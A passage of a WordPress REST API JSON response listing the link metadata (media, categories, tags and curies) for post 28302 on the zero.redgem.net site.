"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=28302"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=28302"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=28302"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}